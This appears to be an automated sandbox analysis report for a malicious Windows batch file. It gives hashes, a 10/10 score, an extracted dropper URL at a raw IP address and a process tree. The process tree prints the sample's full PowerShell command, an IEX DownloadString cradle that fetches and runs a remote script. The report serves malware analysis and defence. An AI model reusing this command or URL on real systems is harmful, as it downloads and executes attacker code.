Analysis
-
max time kernel
132s -
max time network
69s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
55022f44a9c2dac0916e9db3842398df.bat
-
Size
219B
-
MD5
07ea4461f7fc0758bb7fb455966df5d9
-
SHA1
2df15ea78ad89a7816a69bab5656274115bed854
-
SHA256
dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
-
SHA512
b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2088 1576 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2088 WerFault.exe Token: SeBackupPrivilege 2088 WerFault.exe Token: SeDebugPrivilege 2088 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"1⤵PID:1312
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"2⤵PID:1576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2088